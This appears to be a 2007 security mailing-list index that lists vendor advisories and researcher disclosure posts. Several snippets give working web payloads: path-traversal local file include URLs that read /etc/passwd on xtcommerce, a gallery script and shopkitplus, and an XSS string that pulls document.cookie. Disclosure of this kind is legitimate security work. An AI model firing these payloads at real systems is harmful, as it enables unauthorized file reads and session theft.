[ MDKSA-2007:048 ] - Updated php packages fix multiple vulnerabilities

-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ___ Mandriva Linux Security Advisory MDKSA-2007:048 http://www.mandriva.com/security/ ___

Stack Overflow in Third-Party ActiveX Controls affects Multiple Vendor Products Including Some Symantec Consumer Products and Automated Support

Symantec Security Advisory SYM07-002 http://www.symantec.com/avcenter/security/Content/2007.02.22.html BID 22564 22 Feb, 2007 Stack Overflow in Third-Party ActiveX Controls affects Multiple Vendor Products Including Some Symantec Consumer Products and Automated Support Assistant Revision Hist

xtcommerce local file include

xtcommerce local file include local file include: /index.php?currency=EUR&manufacturers_id=1&template=../../../../../../../../etc/passwd%00 regards laurent gaffié

Re: Re: SYMSA-2007-002: Palm OS Treo Find Feature System Password Bypass

You can view only a prefix or header of the memo/document/calendar...etc, but not the complete content. The edit/paste feature is only for the Find window. There is no short cut to open and view the contents of a document/memo...etc, when the phone is locked. I can understand why Palm does not

[ MDKSA-2007:049 ] - Updated spamassassin packages fix DoS vulnerability

-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ___ Mandriva Linux Security Advisory MDKSA-2007:049 http://www.mandriva.com/security/ ___

Simple one-file gallery

local file include: /gallery.php?f=../../../../../../../../../../../../etc/passwd xss via php error : /gallery.php?f='">alert(document.cookie) regards laurent gaffié

shopkitplus local file include

lfi: /shopkitplus/enc/stylecss.php?changetheme=../../../../../../../../../../../../etc/passwd full path: /shopkitplus/events.php?curmonth[]=01 /shopkitplus/enc/stylecss.php?changetheme[]= regards laurent gaffié

Advisory 03/2007: Multiple Browsers Cross Domain Charset Inheritance Vulnerability

-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Hardened-PHP Project www.hardened-php.net -= Security Advisory =- Advisory: Multiple Browsers Cross Domain Charset Inheritance Vulnerability Release Date: 2007/02/23 Last

Secunia Research: Internet Explorer 7 "onunload" Event Spoofing Vulnerability

== Secunia Research 23/02/2007 - Internet Explorer 7 "onunload" Event Spoofing Vulnerability - == Table of Conte

rPSA-2007-0038-1 spamassassin

rPath Security Advisory: 2007-0038-1 Published: 2007-02-23 Products: rPath Linux 1 Rating: Minor Exposure Level Classification: Remote Deterministic Denial of Service Updated Versions: spamassassin=/[EMAIL PROTECTED]:devel//1/3.1.8-0.1-1 References: http://www.cve.mitre.org/cgi-bin/cve

MSIE7 browser entrapment vulnerability (probably Firefox, too)

There is a cool combination-type vulnerability in MSIE7 that allows the attacker to: a) Trap the visitor in a Matrix-esque tarpit webpage that cannot be left by normal means (this is a known brain-damaged design of onUnload Javascript handlers), b) Spoof transitions between pages so

iDefense Security Advisory 02.23.07: Mozilla Network Security Services SSLv2 Server Stack Overflow Vulnerability

Mozilla Network Security Services SSLv2 Client Integer Underflow Vulnerability iDefense Security Advisory 02.23.07 http://labs.idefense.com/intelligence/vulnerabilities/ Feb 23, 2007 I. BACKGROUND Network Security Services (NSS) is a set of libraries designed to support cross-platform developmen

Re: JBoss jmx-console CSRF

Hey dude! What's the authentication mechanism used by JBoss console? A login HTML form, or HTTP basic auth? If it's the first one and cookies are used as session tokens your exploit should work (the web browser will submit the cookie to the target IP/domain when the evil page is visited). Althou

Firefox Cache Hack - Firefox History Hack redux

http://www.gnucitizen.org/projects/hscan-redux/ Inspired by Michal Zalewski recent Firefox bug hunt, I decided to give it a go and see what I can come up with. We all know how vulnerable Firefox and other browsers are. This is the reason why I am not particularly interested in finding specific br

iDefense Security Advisory 02.23.07: Mozilla Network Security Services SSLv2 Client Integer Underflow Vulnerability

Mozilla Network Security Services SSLv2 Client Integer Underflow Vulnerability iDefense Security Advisory 02.23.07 http://labs.idefense.com/intelligence/vulnerabilities/ Feb 23, 2007 I. BACKGROUND Network Security Services (NSS) is a set of libraries designed to support cross-platform developmen

FlashGameScript v1.5.4 Remote File Inclusion Vulnerability

Author : JuMp-Er Date: feb, 21th 2007 Level : Dangerous contact:: aH-crew[at]hotmail[dot]com Software description --

rPSA-2007-0036-1 kernel

rPath Security Advisory: 2007-0036-1 Published: 2007-02-23 Products: rPath Linux 1 Rating: Severe Exposure Level Classification: Remote User Deterministic Denial of Service Updated Versions: kernel=/[EMAIL PROTECTED]:devel//1/2.6.19.4-0.1-1 References: http://www.cve.mitre.org/cgi-bin/

Re: [Full-disclosure] Firefox bookmark cross-domain surfing vulnerability

michal, is that a feature or a bug? maybe it is not obivous to me what you are doing but it i feel that it is almost like asking the user to bookmark a bookmarklet. of course it is a security problem if you execute untrusted bookmarklet on a page :). On 2/21/07, Michal Zalewski <[EMAIL PROTECTED]

[USN-427-1] enigmail vulnerability

=== Ubuntu Security Notice USN-427-1 February 23, 2007 enigmail vulnerability CVE-2006-5877 === A security issue affects the following Ubuntu releases: Ubuntu 5.10 Ubuntu 6.06

Firefox onUnload + document.write() memory corruption vulnerability (MSIE7 null ptr)

While researching my previous report on MSIE7 browser entrapment, I noticed that Firefox is susceptible to a pretty nasty, and apparently easily exploitable memory corruption vulnerability. When a location transition occurs and the structure of a document is modified from within onUnload event hand

[OpenPKG-SA-2007.010] OpenPKG Security Advisory (php)

-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Publisher Name: OpenPKG GmbH Publisher Home: http://openpkg.com/ Advisory Id (public):OpenPKG-SA-2007.010 Advisory Type: OpenPKG Security Adv

Re: [ECHO_ADV_66$2007] SendStudio <= 2004.14 Remote File Inclusion Vulnerability

[EMAIL PROTECTED] wrote: ECHO_ADV_66$2007 - [ECHO_ADV_66$2007] SendStudio <= 2004.14 Remote File Inclusion Vulnerability ---

Re: [Full-disclosure] Firefox Cache Hack - Firefox History Hack redux

pdp (architect) wrote: it tells you which URLs you have attended during the current browser session Filed bug It seems you can only test for specific URLs, not really getting the list. See also bug

iDefense Security Advisory 02.22.07: IBM DB2 Universal Database Multiple Privilege Escalation Vulnerabilities

IBM DB2 Universal Database Multiple Privilege Escalation Vulnerabilities iDefense Security Advisory 02.22.07 http://labs.idefense.com/intelligence/vulnerabilities/ Feb 22, 2007 I. BACKGROUND IBM Corp.'s DB2 Universal Database product is a large database server product commonly used for higher en

Firefox: onUnload tailgating (MSIE7 entrapment bug variant)

On Fri, 23 Feb 2007, Michal Zalewski wrote: > Firefox isn't outright vulnerable to this problem, but judging from its > behavior, it is likely to be susceptible to a variant of this bug And indeed, susceptible it is. On the surface, the problem is even more serious: the unloaded page can run Java

Re: Web Apps- Rad Upload Version 3.02 Remote File Include Vulnerability

1) Obviously the poster is unaware that PHP register_globals have been off for a long long time and thus a value of the save_path cannot be passed in through the url as described by the poster. http://au2.php.net/manual/en/security.globals.php 2) He has failed to notice the $save_path is set wit

RE: Overtaking Google Desktop

In November of 2005, Matan Gillon discovered a vulnerability in Internet Explorer in the way it handled the CSS import directive (http://www.hacker.co.il/security/ie/css_import.html). He proved the danger of the IE vulnerability by attacking Google Desktop. This proof of concept proved a powerfu

RE: Re[2]: Solaris telnet vulnberability - how many on your network?

Fun ole exploit. Of course, it doesn't have to be C's. I use numbers 1-9 and 0, repeated so its easier to count 64 characters. It can be nearly any character, as long as you have the spaces in between. It doesn't even have to be 64 characters all the time, but it normally has to be 64 or slightly